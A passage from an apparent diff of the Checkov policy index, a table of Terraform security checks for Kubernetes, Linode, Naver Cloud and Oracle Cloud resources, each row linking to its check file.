CKV_K8S_26 | resource | kubernetes_deployment_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | +| 1924 | CKV_K8S_26 | resource | kubernetes_pod | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | +| 1925 | CKV_K8S_26 | resource | kubernetes_pod_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | +| 1926 | CKV_K8S_27 | resource | kubernetes_daemon_set_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 1927 | CKV_K8S_27 | resource | kubernetes_daemonset | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 1928 | CKV_K8S_27 | resource | kubernetes_deployment | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 1929 | CKV_K8S_27 | resource | kubernetes_deployment_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 1930 | CKV_K8S_27 | resource | kubernetes_pod | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 1931 | CKV_K8S_27 | resource | kubernetes_pod_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 1932 | CKV_K8S_28 | resource | kubernetes_deployment | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | +| 1933 | CKV_K8S_28 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | +| 1934 | CKV_K8S_28 | resource | kubernetes_pod | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | +| 1935 | CKV_K8S_28 | resource | kubernetes_pod_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | +| 1936 | CKV_K8S_29 | resource | kubernetes_daemon_set_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 1937 | CKV_K8S_29 | resource | kubernetes_daemonset | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 1938 | CKV_K8S_29 | resource | kubernetes_deployment | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 1939 | CKV_K8S_29 | resource | kubernetes_deployment_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 1940 | CKV_K8S_29 | resource | kubernetes_pod | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 1941 | CKV_K8S_29 | resource | kubernetes_pod_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 1942 | CKV_K8S_30 | resource | kubernetes_deployment | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | +| 1943 | CKV_K8S_30 | resource | kubernetes_deployment_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | +| 1944 | CKV_K8S_30 | resource | kubernetes_pod | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | +| 1945 | CKV_K8S_30 | resource | kubernetes_pod_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | +| 1946 | CKV_K8S_32 | resource | kubernetes_pod_security_policy | Ensure default seccomp profile set to docker/default or runtime/default | Terraform | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py) | +| 1947 | CKV_K8S_34 | resource | kubernetes_deployment | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 1948 | CKV_K8S_34 | resource | kubernetes_deployment_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 1949 | CKV_K8S_34 | resource | kubernetes_pod | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 1950 | CKV_K8S_34 | resource | kubernetes_pod_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 1951 | CKV_K8S_35 | resource | kubernetes_deployment | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 1952 | CKV_K8S_35 | resource | kubernetes_deployment_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 1953 | CKV_K8S_35 | resource | kubernetes_pod | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 1954 | CKV_K8S_35 | resource | kubernetes_pod_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 1955 | CKV_K8S_36 | resource | kubernetes_pod_security_policy | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py) | +| 1956 | CKV_K8S_37 | resource | kubernetes_deployment | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 1957 | CKV_K8S_37 | resource | kubernetes_deployment_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 1958 | CKV_K8S_37 | resource | kubernetes_pod | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 1959 | CKV_K8S_37 | resource | kubernetes_pod_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 1960 | CKV_K8S_39 | resource | kubernetes_deployment | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 1961 | CKV_K8S_39 | resource | kubernetes_deployment_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 1962 | CKV_K8S_39 | resource | kubernetes_pod | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 1963 | CKV_K8S_39 | resource | kubernetes_pod_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 1964 | CKV_K8S_41 | resource | kubernetes_service_account | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | +| 1965 | CKV_K8S_41 | resource | kubernetes_service_account_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | +| 1966 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 1967 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 1968 | CKV_K8S_42 | resource | kubernetes_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 1969 | CKV_K8S_42 | resource | kubernetes_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 1970 | CKV_K8S_43 | resource | kubernetes_deployment | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 1971 | CKV_K8S_43 | resource | kubernetes_deployment_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 1972 | CKV_K8S_43 | resource | kubernetes_pod | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 1973 | CKV_K8S_43 | resource | kubernetes_pod_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 1974 | CKV_K8S_44 | resource | kubernetes_service | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | +| 1975 | CKV_K8S_44 | resource | kubernetes_service_v1 | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | +| 1976 | CKV_K8S_49 | resource | kubernetes_cluster_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 1977 | CKV_K8S_49 | resource | kubernetes_cluster_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 1978 | CKV_K8S_49 | resource | kubernetes_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 1979 | CKV_K8S_49 | resource | kubernetes_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 1980 | CKV_LIN_1 | provider | linode | Ensure no hard coded Linode tokens exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py) | +| 1981 | CKV_LIN_2 | resource | linode_instance | Ensure SSH key set in authorized_keys | Terraform | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py) | +| 1982 | CKV_LIN_3 | resource | linode_user | Ensure email is set | Terraform | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py) | +| 1983 | CKV_LIN_4 | resource | linode_user | Ensure username is set | Terraform | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py) | +| 1984 | CKV_LIN_5 | resource | linode_firewall | Ensure Inbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py) | +| 1985 | CKV_LIN_6 | resource | linode_firewall | Ensure Outbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py) | +| 1986 | CKV_NCP_1 | resource | ncloud_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py) | +| 1987 | CKV_NCP_2 | resource | ncloud_access_control_group | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | +| 1988 | CKV_NCP_2 | resource | ncloud_access_control_group_rule | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | +| 1989 | CKV_NCP_3 | resource | ncloud_access_control_group_rule | Ensure no security group rules allow outbound traffic to 0.0.0.0/0 | Terraform | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py) | +| 1990 | CKV_NCP_4 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22 | Terraform | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py) | +| 1991 | CKV_NCP_5 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py) | +| 1992 | CKV_NCP_6 | resource | ncloud_server | Ensure Server instance is encrypted. | Terraform | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py) | +| 1993 | CKV_NCP_7 | resource | ncloud_launch_configuration | Ensure Basic Block storage is encrypted. | Terraform | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py) | +| 1994 | CKV_NCP_8 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20 | Terraform | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py) | +| 1995 | CKV_NCP_9 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21 | Terraform | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py) | +| 1996 | CKV_NCP_10 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22 | Terraform | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py) | +| 1997 | CKV_NCP_11 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py) | +| 1998 | CKV_NCP_12 | resource | ncloud_network_acl_rule | An inbound Network ACL rule should not allow ALL ports. | Terraform | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py) | +| 1999 | CKV_NCP_13 | resource | ncloud_lb_listener | Ensure LB Listener uses only secure protocols | Terraform | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py) | +| 2000 | CKV_NCP_14 | resource | ncloud_nas_volume | Ensure NAS is securely encrypted | Terraform | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py) | +| 2001 | CKV_NCP_15 | resource | ncloud_lb_target_group | Ensure Load Balancer Target Group is not using HTTP | Terraform | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py) | +| 2002 | CKV_NCP_16 | resource | ncloud_lb | Ensure Load Balancer isn't exposed to the internet | Terraform | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py) | +| 2003 | CKV_NCP_18 | resource | ncloud_auto_scaling_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | +| 2004 | CKV_NCP_18 | resource | ncloud_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | +| 2005 | CKV_NCP_19 | resource | ncloud_nks_cluster | Ensure Naver Kubernetes Service public endpoint disabled | Terraform | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py) | +| 2006 | CKV_NCP_20 | resource | ncloud_route | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity | Terraform | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py) | +| 2007 | CKV_NCP_22 | resource | ncloud_nks_cluster | Ensure NKS control plane logging enabled for all log types | Terraform | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py) | +| 2008 | CKV_NCP_22 | resource | ncloud_route_table | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | +| 2009 | CKV_NCP_22 | resource | ncloud_subnet | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | +| 2010 | CKV_NCP_23 | resource | ncloud_public_ip | Ensure Server instance should not have public IP. | Terraform | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py) | +| 2011 | CKV_NCP_24 | resource | ncloud_lb_listener | Ensure Load Balancer Listener Using HTTPS | Terraform | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py) | +| 2012 | CKV_NCP_25 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80 | Terraform | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py) | +| 2013 | CKV_NCP_26 | resource | ncloud_access_control_group | Ensure Access Control Group has Access Control Group Rule attached | Terraform | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml) | +| 2014 | CKV_OCI_1 | provider | oci | Ensure no hard coded OCI private key in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py) | +| 2015 | CKV_OCI_2 | resource | oci_core_volume | Ensure OCI Block Storage Block Volume has backup enabled | Terraform | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py) | +| 2016 | CKV_OCI_3 | resource | oci_core_volume | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) | Terraform | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py) | +| 2017 | CKV_OCI_4 | resource | oci_core_instance | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled | Terraform | [InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py) | +| 2018 | CKV_OCI_5 | resource | oci_core_instance | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled | Terraform | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py) | +| 2019 | CKV_OCI_6 | resource | oci_core_instance | Ensure OCI Compute Instance has monitoring enabled | Terraform | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py) | +| 2020 | CKV_OCI_7 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage bucket can emit object events | Terraform | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py) | +| 2021 | CKV_OCI_8 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage has versioning enabled | Terraform | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py) | +| 2022 | CKV_OCI_9 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is encrypted with Customer Managed Key | Terraform | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py) | +| 2023 | CKV_OCI_10 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is not Public | Terraform | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py) | +| 2024 | CKV_OCI_11 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain lower case | Terraform | [IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py) | +| 2025 | CKV_OCI_12 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Numeric characters | Terraform | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py) | +| 2026 | CKV_OCI_13 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Special characters | Terraform | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py) | +| 2027 | CKV_OCI_14 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Uppercase characters | Terraform | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py) | +| 2028 | CKV_OCI_15 | resource | oci_file_storage_file_system | Ensure OCI File System is Encrypted with a customer Managed Key | Terraform | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py) | +| 2029 | CKV_OCI_16 | resource | oci_core_security_list | Ensure VCN has an inbound security list | Terraform | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py) | +| 2030 | CKV_OCI_17 | resource | oci_core_security_list | Ensure VCN inbound security lists are stateless | Terraform | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py) | +| 2031 | CKV_OCI_18 | resource | oci_identity_authentication_policy | OCI IAM password policy for local (non-federated) users has a minimum length of 14 characters | Terraform | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py) | +| 2032 | CKV_OCI_19 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 22. | Terraform | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py) | +| 2033 | CKV_OCI_20 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389. | Terraform | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py) | +| 2034 | CKV_OCI_21 | resource | oci_core_network_security_group_security_rule | Ensure security group has stateless ingress security rules | Terraform | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py) | +| 2035 | CKV_OCI_22 | resource | oci_core_network_security_group_security_rule | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22 | Terraform | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py) | +| 2036 | CKV2_OCI_1 | resource | oci_identity_group | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 2037 | CKV2_OCI_1 | resource | oci_identity_user | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 2038 | CKV2_OCI_1 | resource | oci_identity_user_group_membership | Ensure administrator users are not associated with API keys | Terraform | 